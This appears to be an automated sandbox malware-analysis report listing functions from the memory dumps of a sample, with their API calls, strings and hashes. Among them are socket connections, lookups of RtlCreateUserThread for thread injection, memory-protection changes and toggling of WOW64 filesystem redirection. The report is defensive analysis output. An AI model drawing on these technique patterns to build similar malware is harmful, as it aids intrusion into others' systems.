Opcode ID: f24ba2780b4c7248709cc773c92c273bda334e89d1f2173b78334bbc70865e74
Instruction ID: 041e2d84988c1c14d615909e2c04fbd3cc33eb4435ace2b7cbcad2552855ff4f
Opcode Fuzzy Hash: f24ba2780b4c7248709cc773c92c273bda334e89d1f2173b78334bbc70865e74
Instruction Fuzzy Hash: E511A736510A21CBCB31EF15F900967B7B7EF46F1030A4559D88157754EB31EC868B99

Function 03D8E8E1 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03D8E8ED

Part of subcall function 03D8A735: __getptd_noexit.LIBCMT ref: 03D8A738
Part of subcall function 03D8A735: __amsg_exit.LIBCMT ref: 03D8A745

__amsg_exit.LIBCMT ref: 03D8E90D
__lock.LIBCMT ref: 03D8E91D
InterlockedDecrement.KERNEL32(?), ref: 03D8E93A
InterlockedIncrement.KERNEL32(03F21658), ref: 03D8E965

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: c64c520d306ab4e5bb1a17c0cef0ad3e88294abc8018790b0b3c1b01ad0e0408
Instruction ID: 4ed70178ee7a1acc43f716730b3d284aabad549c71e0a4b61e37c103422c3d9b
Opcode Fuzzy Hash: c64c520d306ab4e5bb1a17c0cef0ad3e88294abc8018790b0b3c1b01ad0e0408
Instruction Fuzzy Hash: 04019276900B11DBDB61FF6AE50475DB7A0EF05B20F184106E848AB384DB74B642DFE1

Function 03D73293 Relevance: 7.5, APIs: 5, Instructions: 45networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 03D732A0
gethostbyname.WS2_32(?), ref: 03D732B4
htons.WS2_32(03D73377), ref: 03D732DD
connect.WS2_32(00000000,?,00000010), ref: 03D732ED
closesocket.WS2_32(00000000), ref: 03D732F7

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: closesocketconnectgethostbynamehtonssocket
String ID:
API String ID: 530611402-0
Opcode ID: 6b5459dddbb5eaa8eaf2d61643f573dd3c21ea2df64de0b006c80e65a13eed77
Instruction ID: 35baed8947c95567dd300ca624f5d5382c2326ad7dff632eddcb4e6a4d5f0531
Opcode Fuzzy Hash: 6b5459dddbb5eaa8eaf2d61643f573dd3c21ea2df64de0b006c80e65a13eed77
Instruction Fuzzy Hash: 5BF08139950329BAEF10F7B59C05FAEB768DF04620F444252FD50AE1E2F7B0D60193A5

Function 0397B2C1 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0397B2C8

Part of subcall function 03984D1B: __FF_MSGBANNER.LIBCMT ref: 03984D3E
Part of subcall function 03984D1B: __NMSG_WRITE.LIBCMT ref: 03984D45

_malloc.LIBCMT ref: 0397B2D5
_malloc.LIBCMT ref: 0397B2F0
__snprintf.LIBCMT ref: 0397B303
_malloc.LIBCMT ref: 0397B322

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _malloc$__snprintf
String ID:
API String ID: 1839626857-0
Opcode ID: e649b3e7cbf663415a55fa81f3617608902048137d732bf6880235c26b68b3c0
Instruction ID: 5a9e9f4442405cc9a5a2d1d9106881ceee658cbabef00c7a3eafbc507c7df359
Opcode Fuzzy Hash: e649b3e7cbf663415a55fa81f3617608902048137d732bf6880235c26b68b3c0
Instruction Fuzzy Hash: 840162755007056EDB10EF7ACC44996BBECDF95754F10882DF94DCB601D674E54487A0

Function 03D857F0 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 03D8580E

Part of subcall function 03D876E3: __mtinitlocknum.LIBCMT ref: 03D876F9
Part of subcall function 03D876E3: __amsg_exit.LIBCMT ref: 03D87705
Part of subcall function 03D876E3: EnterCriticalSection.KERNEL32(00000000,00000000,?,03D8A7E0,0000000D,03DA0790,00000008,03D8A8D7,00000000,?,03D87315,00000000,?,?,?,03D87378), ref: 03D8770D

___sbh_find_block.LIBCMT ref: 03D85819
___sbh_free_block.LIBCMT ref: 03D85828
HeapFree.KERNEL32(00000000,00000000,03DA05E8,0000000C,03D8A726,00000000,?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C), ref: 03D85858
GetLastError.KERNEL32(?,03D8D8A9,00000000,00000001,00000000,?,03D8766D,00000018,03DA0748,0000000C,03D876FE,00000000,00000000,?,03D8A7E0,0000000D), ref: 03D85869

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 2d573477dc3cdd7c19c2ba2a8b6f358abedb0ecc5dc3c3fb0d7519ae99f747e2
Instruction ID: 01fa61d8786c3b43de670bf6fe679d473fd3e8e29bd09fe6e2e29c539154bb68
Opcode Fuzzy Hash: 2d573477dc3cdd7c19c2ba2a8b6f358abedb0ecc5dc3c3fb0d7519ae99f747e2
Instruction Fuzzy Hash: FA01867690030AEADF20FB75AC05B5E7B79EF02B60F64055AE444AA184DB34F540DA74

Function 03D7B5FE Relevance: 7.5, APIs: 5, Instructions: 43threadsleepsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D71A64: VirtualProtect.KERNEL32(?,?,03D7167C,00000000,00000000,00000080,?,?,03D7B61F,00000000,00000001,00000000,00000000,03D7167C), ref: 03D71ADC

Sleep.KERNEL32(000003E8,00000000,00000000,03D7167C), ref: 03D7B634
ExitThread.KERNEL32 ref: 03D7B63E
CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF), ref: 03D7B658
WaitForSingleObject.KERNEL32(00000000), ref: 03D7B65F
ExitProcess.KERNEL32 ref: 03D7B66A

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: ExitThread$CreateObjectProcessProtectSingleSleepVirtualWait
String ID:
API String ID: 3896636542-0
Opcode ID: 5f9470a6a1e48c91030a83e33b53f78edbdbed7c86fd63992be9c7523735b256
Instruction ID: a67e2578247800b27e8c7956290f730a67c9c3eaf6d4ed2abf8b0cfd5fa51aa8
Opcode Fuzzy Hash: 5f9470a6a1e48c91030a83e33b53f78edbdbed7c86fd63992be9c7523735b256
Instruction Fuzzy Hash: D9F09077A44320BAED3077A9AC09F7E2A1DD742E62F114003F605AE2C4EA7044405134

Function 03D766EA Relevance: 7.5, APIs: 5, Instructions: 40sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03D766F7
GetTickCount.KERNEL32 ref: 03D766FE
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 03D76711
Sleep.KERNEL32(0000000A), ref: 03D76722
GetTickCount.KERNEL32 ref: 03D76728

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 60c11213a7e660db20a1e6ff3b71a66d0141f1b1dfda1d65d27590d53ef2cc33
Instruction ID: ccd618853879f45c5ff2f5622579fc5e596f26b9946d52fb7000effe005640cd
Opcode Fuzzy Hash: 60c11213a7e660db20a1e6ff3b71a66d0141f1b1dfda1d65d27590d53ef2cc33
Instruction Fuzzy Hash: C1F08272A1051CBFE701AFA4DC848EF7BACDB459D57280433E105E2500F670DD419764

Function 03D7ABCE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140COMMONLIBRARYCODE

Download Yara Rule

APIs

__snprintf.LIBCMT ref: 03D7AC0D
__snprintf.LIBCMT ref: 03D7AC1F
_strncmp.LIBCMT ref: 03D7ACF5

Strings

abcdefghijklmnop, xrefs: 03D7ACA7

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf$_strncmp
String ID: abcdefghijklmnop
API String ID: 3493850238-2486878355
Opcode ID: 561fa4314f3f27f065c56df1b7582313e71d78489ab9cb84b772a8d4db29a5ae
Instruction ID: 9968498d5052437c45e4906aba9dc22d83d1892fcd65452900bb4b03ee9bfd07
Opcode Fuzzy Hash: 561fa4314f3f27f065c56df1b7582313e71d78489ab9cb84b772a8d4db29a5ae
Instruction Fuzzy Hash: CB417676900609BFEB01DFF8D9419EFB3BDDF49244B144561E901EB150FA31EF0986A2

Function 03988D57 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133COMMON

Download Yara Rule

Strings

, xrefs: 03988DA5
l, xrefs: 03988D7E
2, xrefs: 03988DD8

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID: $2$l
API String ID: 0-3132104027
Opcode ID: 235de7ee64cc3afe11349d5e718bf4f5f5b5fdc94c69d23203b1804ae805e9ce
Instruction ID: 6ccd3b0127bf8b9112574e5a8537b3ddabc6f6ef984e0afd96dc99167048bea5
Opcode Fuzzy Hash: 235de7ee64cc3afe11349d5e718bf4f5f5b5fdc94c69d23203b1804ae805e9ce
Instruction Fuzzy Hash: 2B412B7694925C8EDF38FF18C8C83F8BBB9AB81355F4805D6C4556A091C7744AC6CF11

Function 03D71FAA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,?), ref: 03D7209A
LoadLibraryA.KERNEL32(00000000,?,?,?), ref: 03D720A5
GetProcAddress.KERNEL32(00000000,00000000), ref: 03D720AD

Part of subcall function 03D724B5: _vswprintf_s.LIBCMT ref: 03D724D1

Strings

%s!%s, xrefs: 03D720EA

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
String ID: %s!%s
API String ID: 2092861438-2935588013
Opcode ID: 221fba782f86e80e3a79b86a4bd9bf44c3b4528e33c9f6f4a71c1bebab2c491c
Instruction ID: e16d954c648e29105d50948841162825b9de7e611bf0950ecb8c57ba7287beb1
Opcode Fuzzy Hash: 221fba782f86e80e3a79b86a4bd9bf44c3b4528e33c9f6f4a71c1bebab2c491c
Instruction Fuzzy Hash: E94146769041409BDF28DF60D848E7B77B9EB84B20F694896DA02AF281F731DC56C770

Function 03987FF3 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

, xrefs: 03988041
l, xrefs: 0398801A
2, xrefs: 03988074

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID:
String ID: $2$l
API String ID: 0-3132104027
Opcode ID: 752d0f1a8b36f8092a05fbacc9ca9b456277ca2e10b71c12eea6a6c1fc46a698
Instruction ID: 4d67e9981fbe3b83bceef45e83b4adf495727615c98deb7d0f0857166a6d1a57
Opcode Fuzzy Hash: 752d0f1a8b36f8092a05fbacc9ca9b456277ca2e10b71c12eea6a6c1fc46a698
Instruction Fuzzy Hash: 2241A47484D3688FDF34EF248C883F8BB69BB81355FA809D6C0A56A191C7754AC6CF61

Function 03D7862F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D78637
__snprintf.LIBCMT ref: 03D78679
__snprintf.LIBCMT ref: 03D7869B

Strings

%s%s, xrefs: 03D78670, 03D78692

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf$_memset
String ID: %s%s
API String ID: 444161222-3438391663
Opcode ID: 39bd6694ce41d41e449d092901fb670cd49b3b26a8b6105502f7084572e01e59
Instruction ID: 262c5161bdcc54e969afb6fb41313df6370e11ccda62cff56cb5c66b4c26981e
Opcode Fuzzy Hash: 39bd6694ce41d41e449d092901fb670cd49b3b26a8b6105502f7084572e01e59
Instruction Fuzzy Hash: 1E016975104208BFCB11EF14C889E9B77A9FB8AB10F494459F9854B261E631E909DB62

Function 00402026 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401CE0: VirtualQuery.KERNEL32 ref: 00401D67

VirtualProtect.KERNEL32 ref: 00401FE7

Strings

4F@, xrefs: 00402030
4F@, xrefs: 00402067
4F@, xrefs: 00402035

Memory Dump Source

Source File: 00000000.00000002.4136714904.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4136703049.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136727118.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136738409.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4136748950.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vNenBbeRFZ.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: 4F@$4F@$4F@
API String ID: 1027372294-3257761137
Opcode ID: b5f0d288534dda81ffc48981baf5e8229db671687252ca89ed87e179abc3c229
Instruction ID: 4e66713ff52e350cd557aa3b03fa9ee7e0cac2971937ec36b9246f2f5b69580e
Opcode Fuzzy Hash: b5f0d288534dda81ffc48981baf5e8229db671687252ca89ed87e179abc3c229
Instruction Fuzzy Hash: 5F1148769006068FCB10CF14D98078AB3F1FF84344F15882AD95977265E339B9168F89

Function 03D7AFDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D7AFE6
GetCurrentProcess.KERNEL32(03D7B056), ref: 03D7B000

Part of subcall function 03D7AF43: _memset.LIBCMT ref: 03D7AF5D
Part of subcall function 03D7AF43: __snprintf.LIBCMT ref: 03D7AFBC

Strings

system32, xrefs: 03D7B02B
syswow64, xrefs: 03D7B019

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: _memset$CurrentProcess__snprintf
String ID: system32$syswow64
API String ID: 3270679572-3098820961
Opcode ID: 80e1b972a1642de23ed20a817262ca84f0acecb11fbca0c67c60719827b0fa11
Instruction ID: 1b0834e240ed7e5e8dadf0e390c6d5003397431ff3ee287232837115782ff8b5
Opcode Fuzzy Hash: 80e1b972a1642de23ed20a817262ca84f0acecb11fbca0c67c60719827b0fa11
Instruction Fuzzy Hash: 9AF082B65493056FE719FB24BD02B6D7348DF05754F14405AF9085E3C1FFA5624181AA

Function 03D75AE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,RtlCreateUserThread,00000000,00000000,00000000,03D754C2,?,?,?,?,?,?,?,00000000,?,03D754C2), ref: 03D75AF9
GetProcAddress.KERNEL32(00000000), ref: 03D75B00

Strings

ntdll.dll, xrefs: 03D75AF1
RtlCreateUserThread, xrefs: 03D75AEA

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlCreateUserThread$ntdll.dll
API String ID: 1646373207-2935400652
Opcode ID: b024f27686f4aebb30251ac94a97d09301aeb3aad22c1ccc662fe1cece84e8bc
Instruction ID: bdcb4a60fa6025589357defd7f56378737459afa291b27fa7c44a1d34c1eaa9d
Opcode Fuzzy Hash: b024f27686f4aebb30251ac94a97d09301aeb3aad22c1ccc662fe1cece84e8bc
Instruction Fuzzy Hash: C6F03932901218FFCF11EFE1DC0ACEF7F69EF06A50B148856F526A6004E6749B58EB91

Function 03D785A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D785A8
__snprintf.LIBCMT ref: 03D785D8

Strings

?%s, xrefs: 03D785CF
%s&%s, xrefs: 03D785EB

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf_memset
String ID: %s&%s$?%s
API String ID: 2657849664-1750478248
Opcode ID: de21057ede39281e66c2db0dd3d2e6cf7714014aea4c3f1fae244fc7a7b2b18d
Instruction ID: d2bb712d1c496af43b7110e182d3a48eec64689508c92ba6ac0814279175b5ad
Opcode Fuzzy Hash: de21057ede39281e66c2db0dd3d2e6cf7714014aea4c3f1fae244fc7a7b2b18d
Instruction Fuzzy Hash: A9F065B2548344BFE710EB24CD86E6BB7BCFB85700F44485AF9558A142E674E9148732

Function 03D73912 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,03D76E6F), ref: 03D73924
GetProcAddress.KERNEL32(00000000), ref: 03D7392B

Strings

kernel32, xrefs: 03D7391F
IsWow64Process, xrefs: 03D7391A

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: f82ab909bd65bda8ee67ca0140c8d0ab082b40721110e551f1c41ce78fff6f54
Instruction ID: 9c20075141001aa207a03a9c477be1f3db573593414d043d82862e7f8a0cce9a
Opcode Fuzzy Hash: f82ab909bd65bda8ee67ca0140c8d0ab082b40721110e551f1c41ce78fff6f54
Instruction Fuzzy Hash: 8CE0EC71640219BBEF00DBB5DC0AA6EB7A8AB41A59F544059E411E2240EBB5DA08A750

Function 03D74A19 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,?,03D7314C,?,00000000,00000002), ref: 03D74A26
GetProcAddress.KERNEL32(00000000), ref: 03D74A2D

Strings

kernel32, xrefs: 03D74A21
Wow64RevertWow64FsRedirection, xrefs: 03D74A1C

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 1646373207-3900151262
Opcode ID: 65ff3c8475d3a65738df3c60e1e12f5ac4bcc1eeae615894d2a48af31a98b680
Instruction ID: 8980b6b7e9ea57b0a2161c001a0e3dd572d02c14017465b9542d83cc01e9ab26
Opcode Fuzzy Hash: 65ff3c8475d3a65738df3c60e1e12f5ac4bcc1eeae615894d2a48af31a98b680
Instruction Fuzzy Hash: 01C012322802087FEF00FBF2AC0A90A3B2CAA52D813844012F429E1202EA6280089664

Function 03D749F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,?,03D7312D,?), ref: 03D74A01
GetProcAddress.KERNEL32(00000000), ref: 03D74A08

Strings

kernel32, xrefs: 03D749FC
Wow64DisableWow64FsRedirection, xrefs: 03D749F7

Memory Dump Source

Source File: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D70000, based on PE: true

Associated: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4137199343.0000000003DAF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3d70000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 1646373207-736604160
Opcode ID: b51e5a399de333b34e39c4f8a7c348f47649181af6551716b22b8734074e2d00
Instruction ID: 95ee7c879c7ff908f5365550df90c73d26f5c04c888106e04caf4ae1e9ddf698
Opcode Fuzzy Hash: b51e5a399de333b34e39c4f8a7c348f47649181af6551716b22b8734074e2d00
Instruction Fuzzy Hash: 5EC08C322803087FFF00FBF2EC0A81E3B6CFA46D41B804012F429E1202EA72D8089764

Function 03971DC0 Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 03971E01
__snprintf.LIBCMT ref: 03971E28

Part of subcall function 039776FC: _memset.LIBCMT ref: 0397771D

__snprintf.LIBCMT ref: 03971E6F
__snprintf.LIBCMT ref: 03971E86

Memory Dump Source

Source File: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3970000_vNenBbeRFZ.jbxd

Yara matches

Similarity

API ID: __snprintf$_memset
String ID:
API String ID: 444161222-0
Opcode ID: 392fba3fb3d9d608cc926a53832d434791d2b063994b97974049bb4d13b2cc6d
Instruction ID: a9f92152eb3ca4b899f77217009c19dc62aecb3181f71654e52cbc9255d6f780
